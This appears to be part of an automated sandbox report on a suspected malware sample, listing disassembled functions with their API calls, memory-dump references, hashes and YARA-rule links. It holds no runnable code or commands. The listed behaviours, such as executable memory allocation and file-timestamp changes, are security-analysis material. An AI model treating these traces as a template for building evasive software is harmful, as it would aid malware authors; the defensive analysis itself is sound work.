                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2429186680-0
                                                                                                                                                                                                                                                            • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                                                                                                                                                                                                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                                                                                                                                                            Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 0043214B
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 0043215D
                                                                                                                                                                                                                                                            • _malloc.LIBCMT ref: 0043216F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 680241177-0
                                                                                                                                                                                                                                                            • Opcode ID: 92974448857a051f90ee74f5c6efaf15b423c063d7dc04b13910ab597fafbedb
                                                                                                                                                                                                                                                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92974448857a051f90ee74f5c6efaf15b423c063d7dc04b13910ab597fafbedb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                                                                                                                                                                                                                            Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00409556
                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4217535847-0
                                                                                                                                                                                                                                                            • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                                                                                                                                            • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                                                                                                                                                                                                                            Function 00431DDB Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                                                                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 00431E0D
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                                                                                                                                            • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                                                                                                                                                            • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                                                                                                                                                                                                                            Function 004320F8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043210A
                                                                                                                                                                                                                                                              • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                                                                                                                                                              • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0043211D
                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00432130
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                            • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                                                                                                                                                            • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                                                                                                                                                                                                                                            Function 0046F5E2 Relevance: 3.2, APIs: 2, Instructions: 231memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000060,00003000,00000040,00000000,?,?), ref: 0046F7EF
                                                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 0046F7FE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocVirtual_malloc_memmove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4271362869-0
                                                                                                                                                                                                                                                            • Opcode ID: 1fe86f7ab17f308d70235f60df94900479893dabae08981f78ed77fce3b1a7f5
                                                                                                                                                                                                                                                            • Instruction ID: 06f6eded260787038e6fae8e0f4156d4860f4ef0d4b2bc26c7f19748b35861d8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fe86f7ab17f308d70235f60df94900479893dabae08981f78ed77fce3b1a7f5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D91BF716043018FC700DF15D884A5BB7E5FF88308F14896EF9899B392E778E945CB96
                                                                                                                                                                                                                                                            Function 0040C1F0 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 147308135f3b21b59fe2a839e0a41f8f843447f64c0a584686d16692fa5d6b25
                                                                                                                                                                                                                                                            • Instruction ID: 87b54257044150471c739d151235b364616bdb39e4aa39848fe8ade81c39f20a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 147308135f3b21b59fe2a839e0a41f8f843447f64c0a584686d16692fa5d6b25
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E519371A00105EBCB14DFA5C8C1EABB7A8AF48344F1481AEF905AB692D77CED45C798
                                                                                                                                                                                                                                                            Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                                                                                                                                                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                                                                                                                                                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                                                                                                                                                                                            • _strcat.LIBCMT ref: 0040F786
                                                                                                                                                                                                                                                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                                                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3199840319-0
                                                                                                                                                                                                                                                            • Opcode ID: 98babcbf6829924b463e4e9c6b250955a06192eeb6296d8e3aefad6c6c7dc4f2
                                                                                                                                                                                                                                                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98babcbf6829924b463e4e9c6b250955a06192eeb6296d8e3aefad6c6c7dc4f2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                                                                                                                                                                                            Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0040D779
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeInfoLibraryParametersSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3403648963-0
                                                                                                                                                                                                                                                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                                                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                                                                                                                                                            Function 00461383 Relevance: 3.1, APIs: 2, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004613AC
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004613E7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend$_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1589278365-0
                                                                                                                                                                                                                                                            • Opcode ID: 5799d6943a21685cf37f4b3cfeb138dcae3626468f51d75e9436af5ff55ace86
                                                                                                                                                                                                                                                            • Instruction ID: 97a08093d25c12dededcbb20540d9e966b6334cc13c53f7fb5e1b12164f439a2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5799d6943a21685cf37f4b3cfeb138dcae3626468f51d75e9436af5ff55ace86
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B1106322002142BE710AB299C46B9F7388AFA9324F04443BFA059B381EB79ED4543A9
                                                                                                                                                                                                                                                            Function 00431877 Relevance: 3.1, APIs: 2, Instructions: 57networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 0043189B
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 004318C3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InternetOptionQuery$_malloc
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2619070002-0
                                                                                                                                                                                                                                                            • Opcode ID: 6d313294d476629a8f3ae79724b5f34c259a0275e91cbc2ecca212968965c20d
                                                                                                                                                                                                                                                            • Instruction ID: d338c915724bbfe514befdfbba895777103518f1cf871b5543e5154b2c24ef6a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d313294d476629a8f3ae79724b5f34c259a0275e91cbc2ecca212968965c20d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B01A7B24012187EEA10EF96DCC5CEBB79CEF552A4F00803BF6088B150D575ED95D6B4
                                                                                                                                                                                                                                                            Function 0046D1A6 Relevance: 3.1, APIs: 2, Instructions: 56networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
